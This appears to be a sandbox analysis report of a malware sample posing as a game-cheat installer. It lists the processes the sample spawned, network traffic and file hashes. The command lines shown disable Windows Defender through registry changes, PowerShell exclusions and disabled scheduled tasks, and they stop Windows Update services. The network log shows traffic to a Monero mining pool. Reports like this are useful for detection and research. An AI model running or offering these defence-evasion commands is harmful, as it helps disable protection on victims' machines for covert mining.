-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssA617.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiA604.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrA605.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrA606.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe
"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A6F9.tmp\A6FA.tmp\A6FB.bat C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\Installer\MSIDAD1.tmp
"C:\Windows\Installer\MSIDAD1.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"
C:\Windows\Installer\MSIDAD2.tmp
"C:\Windows\Installer\MSIDAD2.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"
C:\Windows\Installer\MSIDAE3.tmp
"C:\Windows\Installer\MSIDAE3.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"
C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe
"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"
C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe
"C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"
C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe
"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"
C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe
C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 147.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 100.5.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | 174.178.17.96.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.2miners.com | udp |
| DE | 162.19.139.184:12222 | xmr.2miners.com | tcp |
| US | 8.8.8.8:53 | 184.139.19.162.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\text.js
| MD5 | 12148d2dff9ca3478e4467945663fa70 |
| SHA1 | 50998482c521255af2760ed95bbdb1c4f7387212 |
| SHA256 | 1fb82c82d847ebc4aa287f481ff67c8cc9bde03149987b2d43eb0dee2a5160b6 |
| SHA512 | f9f6a61af37d1924e3a9785aa04a33fa0107791d54cb07663c6ea8a68edfae3766682e914b6afaf198eb97c7f73ab53aa500b4661cdabdebd2576526664166f4 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\text.js
| MD5 | 7b33dd38c0c08bf185f5480efdf9ab90 |
| SHA1 | b3d9d61ad3ab1f87712280265df367eff502ef8b |
| SHA256 | d1e41c11aa11e125105d14c95d05e1e1acd3bede89429d3a1c12a71450318f88 |
| SHA512 | 22da641c396f9972b136d4a18eb0747747252cf7d5d89f619a928c5475d79375fbbe42d4e91821102e271ea144f89267ff307cd46494fdf7d6002ce9768b7bd9 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\license
| MD5 | d5f2a6dd0192dcc7c833e50bb9017337 |
| SHA1 | 80674912e3033be358331910ba27d5812369c2fc |
| SHA256 | 5c932d88256b4ab958f64a856fa48e8bd1f55bc1d96b8149c65689e0c61789d3 |
| SHA512 | d1f336ff272bc6b96dc9a04a7d0ef8f02936dd594f514060340478ee575fe01d55fc7a174df5814a4faf72c8462b012998eca7bb898e3f9a3e87205fb9135af2 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\@npmcli\query\LICENSE
| MD5 | c637d431ac5faadb34aff5fbd6985239 |
| SHA1 | 0e28fd386ce58d4a8fcbf3561ddaacd630bc9181 |
| SHA256 | 27d998b503b18cdb16c49e93da04069a99ba8a1d7e18d67146de8e242f9a6d21 |
| SHA512 | a4b744c1d494fcc55cd223c8b7b0ad53f3637aac05fe5c9a2be41c5f5e117610c75a323c7745dfeae0db4126f169c2b7b88649412b6044ba4a94e9a4d8d62535 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\@npmcli\run-script\LICENSE
| MD5 | 89966567781ee3dc29aeca2d18a59501 |
| SHA1 | a6d614386e4974eef58b014810f00d4ed1881575 |
| SHA256 | 898c2bcff663681498ad1ca8235d45b6e70b10cdf1f869a5b5e69f6e46efedd3 |
| SHA512 | 602dd09be2544542a46083e71a6e43fefc99eb884bdd705f629f8b4bf49192c6f8c482cd6a490397afde100be9347524079abb4c6d18bda3f64cf2fb77d2fe4c |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\@sigstore\sign\dist\types\fetch.js
| MD5 | 8963201168a2449f79025884824955f2 |
| SHA1 | b66edae489b6e4147ce7e1ec65a107e297219771 |
| SHA256 | d43aa81f5bc89faa359e0f97c814ba25155591ff078fbb9bfd40f8c7c9683230 |
| SHA512 | 7f65c6403a23d93fb148e8259b012d6552ab3bff178f4a7d6a9d9cec0f60429fc1899e39b4bca8cc08afc75d9a7c7bfdb13fc372ca63c85eb22b0355eb4d6000 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\@sigstore\sign\LICENSE
| MD5 | f03382535cd50de5e9294254cd26acba |
| SHA1 | d3d4d2a95ecb3ad46be7910b056f936a20fefacf |
| SHA256 | 364a130d2ca340bd56eb1e6d045fc6929bb0f9d0aa018f2c1949b29517e1cdd0 |
| SHA512 | bbbbee42189d3427921409284615e31346bdbd970a6939bc1fe7f8eaed1903d9ad0534ddf7283347d406fa439d8559fbf95c6755ece82e684e456fce2b227016 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\ansi-styles\license
| MD5 | 915042b5df33c31a6db2b37eadaa00e3 |
| SHA1 | 5aaf48196ddd4d007a3067aa7f30303ca8e4b29c |
| SHA256 | 48da2f39e100d4085767e94966b43f4fa95ff6a0698fba57ed460914e35f94a0 |
| SHA512 | 9c8b2def76ae5ffe4d636166bf9635d7abd69cdac4bf819a2145f7969646d39ae95c96364bc117f9fa544b98518c294233455d4f665af430c75d70798dd4ab13 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\cross-spawn\node_modules\which\LICENSE
| MD5 | 82703a69f6d7411dde679954c2fd9dca |
| SHA1 | bb408e929caeb1731945b2ba54bc337edb87cc66 |
| SHA256 | 4ec3d4c66cd87f5c8d8ad911b10f99bf27cb00cdfcff82621956e379186b016b |
| SHA512 | 3fa748e59fb3af0c5293530844faa9606d9271836489d2c8013417779d10cc180187f5e670477f9ec77d341e0ef64eab7dcfb876c6390f027bc6f869a12d0f46 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\emoji-regex\LICENSE-MIT.txt
| MD5 | ee9bd8b835cfcd512dd644540dd96987 |
| SHA1 | d7384cd3ed0c9614f87dde0f86568017f369814c |
| SHA256 | 483acb265f182907d1caf6cff9c16c96f31325ed23792832cc5d8b12d5f88c8a |
| SHA512 | 7d6b44bb658625281b48194e5a3d3a07452bea1f256506dd16f7a21941ef3f0d259e1bcd0cc6202642bf1fd129bc187e6a3921d382d568d312bd83f3023979a0 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\inflight\LICENSE
| MD5 | 90a3ca01a5efed8b813a81c6c8fa2e63 |
| SHA1 | 515ec4469197395143dd4bfe9b1bc4e0d9b6b12a |
| SHA256 | 05dc4d785ac3a488676d3ed10e901b75ad89dafcc63f8e66610fd4a39cc5c7e8 |
| SHA512 | c9d6162bef9880a5ab6a5afe96f3ec1bd9dead758ca427f9ba2e8e9d9adaaf5649aad942f698f39b7a9a437984f8dc09141f3834cd78b03104f81ad908d15b31 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\minimatch\dist\cjs\package.json
| MD5 | df9ffc6aa3f78a5491736d441c4258a8 |
| SHA1 | 9d0d83ae5d399d96b36d228e614a575fc209d488 |
| SHA256 | 8005a3491db7d92f36ac66369861589f9c47123d3a7c71e643fc2c06168cd45a |
| SHA512 | 6c58939da58f9b716293a8328f7a3649b6e242bf235fae00055a0cc79fb2788e4a99dfaa422e0cfadbe84e0d5e33b836f68627e6a409654877edc443b94d04c4 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\minimatch\dist\mjs\package.json
| MD5 | d0707362e90f00edd12435e9d3b9d71c |
| SHA1 | 50faeb965b15dfc6854cb1235b06dbb5e79148d2 |
| SHA256 | 3ca9d4afd21425087cf31893b8f9f63c81b0b8408db5e343ca76e5f8aa26ab9a |
| SHA512 | 9d323420cc63c6bee79dcc5db5f0f18f6b8e073daaf8ffa5459e11f2de59a9f5e8c178d77fa92afc9ddd352623dec362c62fff859c71a2fab93f1e2172c4987f |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\minipass\dist\commonjs\package.json
| MD5 | 95b08bc3062cdc4b0334fa9be037e557 |
| SHA1 | a6e024bc66f013d9565542250aef50091391801d |
| SHA256 | fa6944a20ca5e6fbaf98fd202eb8c7004d5b4ab786e36b9ed02ee31dbe196c9f |
| SHA512 | 65c66458abe2101032cdd1b50ca6e643e0c368d09dfa6cc7006b33ed815e106bb20f9aff118181807e7df9f5d4d8d9796709b1ec9a7e04544231636fdf8fdf42 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\minipass\dist\esm\package.json
| MD5 | 6138da8f9bd4f861c6157689d96b6d64 |
| SHA1 | ee2833a41c28830d75b2f3327075286c915ed0dd |
| SHA256 | 6dc1b06d6b093e9cccb20bee06a93836eee0420ae26803ca2ce4065d82f070d1 |
| SHA512 | 0a3f1cb1522c6e7595186a9a54ed073ffa590b26c7d31b0877f19c925f847037e9f972066bfed62609b190eb2bc21ff7b31514e08c3de64780fef5982cbb21f2 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\minipass-json-stream\node_modules\minipass\index.js
| MD5 | a8c344ac3d111b646df0dcae1f2bc3a3 |
| SHA1 | d8a136b49214e498da9c5a6e8cb9681b4fda3149 |
| SHA256 | dbc5220c4bc8b470da9c8e561b6a5382cf3fa9dcd97cace955ac6fd34a27970c |
| SHA512 | 523749e4d38585249f1e3d7cfb2cb23e7f76764b36d0a628f48ff6b50f0a08c8e8526a1236977da1bd4ac0ff0bd8d0ba9b834324f2bdef9bea9394dd6878c51d |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\minipass-json-stream\node_modules\minipass\LICENSE
| MD5 | 78e0c554693f15c5d2e74a90dfef3816 |
| SHA1 | 58823ce936d14f068797501b1174d8ea9e51e9fe |
| SHA256 | a5a110eb524bf3217958e405b5e3411277e915a2f5902c330348877000337e53 |
| SHA512 | b38ebcf2af28488dbf1d3aa6a40f41a8af4893ad6cb8629125e41b2d52c6d501283d882f750fc8323517c4eb3953d89fa0f3c8ceba2ae66a8bf95ae676474f09 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\minipass-json-stream\node_modules\minipass\package.json
| MD5 | 1943a368b7d61cc3792a307ec725c808 |
| SHA1 | fc79b496665e2cdfc4bdaac9c7d7c4b2f4645f2c |
| SHA256 | e99f6b67ba6e5cda438efb7a23dd399ee5c2070af69ce77720d95de5fb42921e |
| SHA512 | 7c05f03f5d3db01798c56c50d21628fc677097630aacf92e9ea47e70ff872d0e4e40217c1c2d5e81fc833ccf5afe9697f8f20a4772459b396aa5c85263289223 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\node-gyp\node_modules\are-we-there-yet\LICENSE.md
| MD5 | 1750b360daee1aa920366e344c1b0c57 |
| SHA1 | fe739dc1a14a033680b3a404df26e98cca0b3ccf |
| SHA256 | 7f75bb21103e77b7acfcf88a6ad0286741a18b5d13c4326160346e8cf7e356ad |
| SHA512 | ff2486d589d32fb35aad9c02cd917ba1e738ca16b7ccc7954cdc4712a968fc5fc25612b489f962cbe8ddb2be40057cd1b59402aa9cade9b6479a1d0e1d7743a4 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\node-gyp\node_modules\cacache\node_modules\brace-expansion\LICENSE
| MD5 | a5df515ef062cc3affd8c0ae59c059ec |
| SHA1 | 433c2b9c71bad0957f4831068c2f5d973cef98a9 |
| SHA256 | 68f12f6e2c33688699249c01d8f9623c534da20aa71989c57b061b7bc1676d14 |
| SHA512 | 0b0068b8beb6864dbb6971d9fe165d2d5fd420bcd6d7bbbd8f42589eb981bf95d854df2d16c21d378ea6d48f562345d2f66de0fd17134dffa8495eb496e6dff0 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\node-gyp\node_modules\minipass\LICENSE
| MD5 | 5f114ac709a085d123e16c1e6363793f |
| SHA1 | 185c2ab72f55bf0a69f28b19ac3849c0ca0d9705 |
| SHA256 | 833faa18ac4b83a6372c05b3643d0d44ecd27d6627b8cd19b0f48fe74260cf39 |
| SHA512 | cab00a78e63dec76fa124fc49d1c28962d674fa18dda5fdf2819078bd932f1bf0cc9abd741b78f62869b4809473099f85ba8a622bc96f4ee92cf11b564346597 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\npm-audit-report\LICENSE
| MD5 | 5324d196a847002a5d476185a59cf238 |
| SHA1 | dfe418dc288edb0a4bb66af2ad88bd838c55e136 |
| SHA256 | 720836c9bdad386485a492ab41fe08007ecf85ca278ddd8f9333494dcac4949d |
| SHA512 | 1b4187c58bebb6378f8a04300da6f4d1f12f6fbe9a1ab7ceda8a4752e263f282daebcac1379fa0675dd78ec86fffb127dba6469f303570b9f21860454df2203f |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\read-package-json-fast\LICENSE
| MD5 | ff53df3ad94e5c618e230ab49ce310fa |
| SHA1 | a0296af210b0f3dc0016cb0ceee446ea4b2de70b |
| SHA256 | ec361617c0473d39347b020eaa6dceedaebab43879fa1cd8b8f0f97a8e80a475 |
| SHA512 | 876b0bd6a10f852661818d5048543bb37389887bf721016b6b7d1fa6d59d230d06f8ff68a59a59f03c25fbc80a2cbb210e7ca8179f111ecd10929b25b3d5cdfe |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\text-table\LICENSE
| MD5 | aea1cde69645f4b99be4ff7ca9abcce1 |
| SHA1 | b2e68ce937c1f851926f7e10280cc93221d4f53c |
| SHA256 | 435a6722c786b0a56fbe7387028f1d9d3f3a2d0fb615bb8fee118727c3f59b7b |
| SHA512 | 518113037ee03540caae63058a98525f9a4a67425bd8c3596f697bed5ae1d2053fe76f76b85a4eefb80cc519f7b03d368cf4b445288c4ca7cacb5e7523f33962 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\tuf-js\LICENSE
| MD5 | 391090fcdb3d37fb9f9d1c1d0dc55912 |
| SHA1 | 138f23e4cc3bb584d7633218bcc2a773a6bbea59 |
| SHA256 | 564bcb001d6e131452a8e9fba0f0ccc59e8b881f84ce3e46e319a5a33e191e10 |
| SHA512 | 070121c80cd92001196fb15efb152188c47fdc589b8f33b9da5881aa9470546b82cb8a8ea96fe1073723f47149e184f1a96c2777a9fc9b45af618c08464d6c5e |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\wide-align\LICENSE
| MD5 | 9d215c9223fbef14a4642cc450e7ed4b |
| SHA1 | 279f47bedbc7bb9520c5f26216b2323e8f0e728e |
| SHA256 | 0cef05dfff8b6aa7f35596984f5709f0d17c2582924a751efa471a76de7cdc11 |
| SHA512 | 5e4ba806f279089d705e909e3c000674c4186d618d6ab381619099f8895af02979f3fc9abb43f78b9ffed33b90a7861f6c4b9d6c1bb47ed14a79e7f90eca833c |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe
| MD5 | 8b38c92c54d9a6c8c5495b6780f06f03 |
| SHA1 | ea81aa7cd651bd303e344aec0732a8b253d3fa0d |
| SHA256 | 48b2ae270b608b91d6123ead7073eca028002007ebcd8d6c3f1924a644bff19a |
| SHA512 | e13d48e1b0478ba8a271931afe34621092f61be7dc91d6a26021a0ec24bf0f8f1879a8eb3e55a464d2fbc0af3416d686bcbc2988519c70f38a666191b2bca709 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe
| MD5 | 3e748d7eb83110806a7f8e732aac4946 |
| SHA1 | 12f52ed8ebfe3a298ab5dfe41cddb28780cc7875 |
| SHA256 | ad577a0747d1995ddf8c7466a2ff9cbc0080d187c15a8916dc2a1af82f781f10 |
| SHA512 | 4ec9c117413eaf8b8515d07e276a111cb1a9a5e962f109cbd8bfd0cc4e4397c5e6a52feb1fac6a3d16cd93072c2c1470d5e4828c920159344602da989c7d6669 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi
| MD5 | 911d55404e4f018aab30393f95f5a0da |
| SHA1 | c0727d78bf46f7b85d9d11752de4ecf1a424dbb4 |
| SHA256 | 48474e1462169bd2c86309ddeecdfd7ea0eda61dc190041fab9073c149c50e76 |
| SHA512 | b58f2401f0d5efaff05bb48ed4f38db19a794227cc1c6a2e13498721536307e11004c11308a5893c69e71a33c028466d67a012f148453ab74f3f6c1fbd03e78c |
C:\Users\Admin\AppData\Local\Temp\MSI5CA8.tmp
| MD5 | c9c085c00bc24802f066e5412defcf50 |
| SHA1 | 557f02469f3f236097d015327d7ca77260e2aecc |
| SHA256 | a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24 |
| SHA512 | a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de |
C:\Users\Admin\AppData\Local\Temp\MSI5D75.tmp
| MD5 | 6bb65410717bb2c62ed92cdbc9c41652 |
| SHA1 | 1f0d56a24588c0c07e878f348df6bb0c3e4f693a |
| SHA256 | 91a6c5daebe89b7d9157188a2b3fa8e47d53b4d20c29bcc244635d1943397f7b |
| SHA512 | 1a864c6d010e3d62337a2067f53e82067ab01a556edee65036658bb7dd863bf22379d16aaf6385fda23060148c68c7225610058a153420e7b125c038285ceb38 |
C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi
| MD5 | 294ceffc1fc15ab2a56429f7b2e485cd |
| SHA1 | d572ad55a44e59d239141dfbef5bf2a2075b761e |
| SHA256 | 6597bec37a328b04bf0e9300a264c30883a3a975921a50076898ab70fe2a8663 |
| SHA512 | 9be1d4c4551e15098726361ffcafe62a1cb1afdf859ce587c6426112f0316d70c11304162f8ed799fe37d288293a559496af1f8c85a6ac66e5a11cce427687f1 |
C:\Windows\Installer\MSI5FB5.tmp
| MD5 | db51934d0c02bd97d619f83d3152490a |
| SHA1 | 875e56adf2d67ec4ce1102cad07be07eada31909 |
| SHA256 | 88ed96b10ce49e29e3bb8b5a48ff32ee29370ceac55a699a8894f438f1216521 |
| SHA512 | 1db8159a57a0183c96a32793d87b8fc2d8c082c9f1208ebf0c65fe6331b9e039902e86d1d5e25a503ab35d9c86142a3fd6abfd315e7d0167ce67364986f6ff9c |
C:\Windows\Installer\MSI6023.tmp
| MD5 | 1a608f644bce169e60f087174985d5c6 |
| SHA1 | b33516de05ae7e722cdf37d72a8a00a930535da1 |
| SHA256 | 03197c048d9319e34ebffd0bbdabc8204904363ea147bfa05090347954873ffa |
| SHA512 | c59b9517af933be4dd2ac0612c35ca63a916efbee8d6987dd7c0fdb87c5bb898465ea176a0b04b70f0ea54900fb4a60e430c1fcc63e531110719dff137706093 |
C:\Windows\Installer\MSI6023.tmp
